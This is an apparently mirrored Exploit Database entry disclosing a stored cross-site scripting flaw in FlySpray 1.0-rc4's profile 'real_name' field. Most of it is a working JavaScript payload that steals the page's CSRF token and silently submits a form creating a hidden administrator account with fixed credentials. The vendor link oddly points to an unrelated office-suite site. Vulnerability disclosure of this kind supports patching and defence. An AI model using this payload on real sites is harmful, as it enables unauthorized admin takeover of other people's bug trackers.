FlySpray 1.0-rc4 – Cross-Site Scripting / Cross-Site Request Forgery

• Exploit Database
• 14 阅读

• 作者： Cyril Vallicari
  日期： 2017-04-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41918/

• # Exploit Title: XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)
  # Date: 19/04/2017
  # Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
  : https://www.openoffice.org
  # Version: 1.0-rc4
  # Tested on: Windows 7 x64 SP1 / Kali Linux
  
  
  Description :
  
  A vulnerability has been discovered in Flyspray , which can be
  exploited by malicious people to conduct cross-site scripting attacks. Input
  passed via the 'real_name' parameter to '/index.php?do=myprofile' is not
  properly sanitised before being returned to the user. This can be exploited
  to execute arbitrary HTML and script code in a user's browser session in
  context of an affected site.
  
  The script is executed on the parameter page AND on any page that allow the
  user to put a comment.
  
  
  This XSS vector allow to execute scripts to gather the CSRF token
  
  and submit a form to create a new admin
  
  
  Here's the script :
  
  var tok = document.getElementsByName('csrftoken')[0].value;
  
  var txt = '<form method="POST" id="hacked_form"
  action="index.php?do=admin&area=newuser">'
  txt += '<input type="hidden" name="action" value="admin.newuser"/>'
  txt += '<input type="hidden" name="do" value="admin"/>'
  txt += '<input type="hidden" name="area" value="newuser"/>'
  txt += '<input type="hidden" name="user_name" value="hacker"/>'
  txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>'
  txt += '<input type="hidden" name="user_pass" value="12345678"/>'
  txt += '<input type="hidden" name="user_pass2" value="12345678"/>'
  txt += '<input type="hidden" name="real_name" value="root"/>'
  txt += '<input type="hidden" name="email_address" value="root@root.com"/>'
  txt += '<input type="hidden" name="verify_email_address" value="
  root@root.com"/>'
  txt += '<input type="hidden" name="jabber_id" value=""/>'
  txt += '<input type="hidden" name="notify_type" value="0"/>'
  txt += '<input type="hidden" name="time_zone" value="0"/>'
  txt += '<input type="hidden" name="group_in" value="1"/>'
  txt += '</form>'
  
  var d1 = document.getElementById('menu');
  d1.insertAdjacentHTML('afterend', txt);
  document.getElementById("hacked_form").submit();
  
  This will create a new admin account, hacker:12345678
  
  POC video : *https://www.youtube.com/watch?v=eCf9a0QpnPs
  
  Patch : No patch yet